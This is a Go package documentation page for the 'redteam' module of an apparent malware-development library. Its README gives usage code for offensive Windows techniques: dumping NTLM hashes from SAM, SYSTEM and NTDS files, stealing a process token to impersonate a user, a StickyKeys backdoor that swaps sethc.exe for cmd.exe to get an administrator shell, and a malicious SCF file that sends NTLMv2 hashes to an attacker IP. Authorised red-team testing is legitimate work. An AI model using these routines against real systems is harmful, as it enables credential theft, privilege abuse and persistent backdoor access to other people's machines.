redteam

package

v0.1.4 Latest Latest Go to latest Published: Aug 29, 2023 License: MIT Imports: 1 Imported by: 0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/D3Ext/maldev

Links

Open Source Insights

README ¶

Red Team Examples

Dump system hashes (different ways)

This functions use gosecretsdump which is really fast and can NTLM dump hashes with a lot of config options

package main

import (
  "fmt"

  "github.com/D3Ext/maldev/redteam"
)

func main(){
  // First way (using SAM and SYSTEM)
  hashes1, err := redteam.DumpSamHashes("C:\\path\\to\\system", "C:\\path\\to\\sam")
  if err != nil {
    log.Fatal(err)
  }
  fmt.Println(hashes1)

  // Second way (using NTDS and SYSTEM)
  hashes2, err := redteam.DumpNtdsHashes("C:\\path\\to\\system", "C:\\path\\to\\ntds")
  if err != nil {
    log.Fatal(err)
  }
  fmt.Println(hashes2)

  // Third way (automated mode)
  hashes3, err := redteam.AutoHashDump()
  if err != nil {
    log.Fatal(err)
  }
  fmt.Println(hashes3)

}

Steal process token (impersonation)

package main

import (
  "log"

  "github.com/D3Ext/maldev/redteam"
)

func main(){

  pid := 1234 // Set PID to steal
  token, err := redteam.Impersonate(pid) // Returns error if user doesn't have privileges
  if err != nil {
    log.Fatal(err)
  }
}

StickyKeys backdoor

This function replaces the sethc.exe binary with a cmd.exe so when you press SHIFT 3 times it launches a terminal as Administrator. It also creates a backup of the sethc.exe binary so you also can use the RevertStickyKeys()

package main

import (
  "fmt"
  "log"

  "github.com/D3Ext/maldev/redteam"
)

func main(){
  err := redteam.StickyKeys()
  if err != nil {
    log.Fatal(err)
  }

  fmt.Println("Backdoor added successfully!")

  err = redteam.RevertStickyKeys()
  if err != nil {
    log.Fatal(err)
  }

  fmt.Println("Backdoor reverted!")
}

Create malicious SCF

With this function you can create a malicious SCF file to obtain NTLMv2 hashes once a user opens the SMB share

package main

import (
  "log"

  "github.com/D3Ext/maldev/redteam"
)

func main(){
  path := "C:\\Path\\To\\Smb\\Share\\malicious.scf" // Path with filename where SCF file will be stored
  ip := "192.168.1.37" // Attacker ip, if a responder is running you will receive NTLMv2 hashes

  err := redteam.CreateScf(path, ip)
  if err != nil {
    log.Fatal(err)
  }
}

Documentation ¶

Rendered for

Index ¶

func CreateScf(filepath string, attacker_ip string) error

Constants ¶

This section is empty.

Variables ¶

This section is empty.

Functions ¶

func CreateScf ¶

func CreateScf(filepath string, attacker_ip string) error

Types ¶

This section is empty.

Source Files ¶

View all Source files

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL